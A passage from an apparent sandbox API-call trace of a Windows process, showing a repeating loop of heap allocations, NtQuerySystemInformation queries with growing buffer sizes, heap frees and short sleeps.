Flags=0x0, Size=0x60) returned 0x285a540 [0304.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0304.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0304.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0304.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0304.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.016] Sleep (dwMilliseconds=0x110) [0304.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0304.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0304.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0304.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0304.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0304.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0304.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0304.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0304.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.037] Sleep (dwMilliseconds=0x110) [0304.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.044] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.044] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0304.044] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0304.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0304.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0304.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0304.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0304.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.046] Sleep (dwMilliseconds=0x110) [0304.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0304.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0304.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0304.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0304.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0304.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0304.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.064] Sleep (dwMilliseconds=0x110) [0304.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0304.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0304.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0304.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0304.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0304.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0304.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.078] Sleep (dwMilliseconds=0x110) [0304.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0304.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0304.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0304.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0304.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0304.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0304.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0304.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0304.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.094] Sleep (dwMilliseconds=0x110) [0304.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0304.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0304.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0304.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0304.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0304.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0304.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0304.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0304.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.109] Sleep (dwMilliseconds=0x110) [0304.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0304.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0304.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0304.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0304.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0304.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0304.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.125] Sleep (dwMilliseconds=0x110) [0304.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0304.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0304.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0304.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0304.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0304.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0304.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0304.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0304.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.142] Sleep (dwMilliseconds=0x110) [0304.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0304.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0304.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0304.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0304.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0304.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0304.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0304.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0304.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.156] Sleep (dwMilliseconds=0x110) [0304.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0304.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0304.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0304.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0304.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0304.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0304.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.173] Sleep (dwMilliseconds=0x110) [0304.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0304.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0304.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0304.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0304.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0304.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0304.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0304.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0304.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.187] Sleep (dwMilliseconds=0x110) [0304.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0304.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0304.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0304.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0304.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0304.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0304.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0304.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0304.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.204] Sleep (dwMilliseconds=0x110) [0304.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0304.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0304.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0304.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0304.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0304.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0304.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.220] Sleep (dwMilliseconds=0x110) [0304.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0304.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, 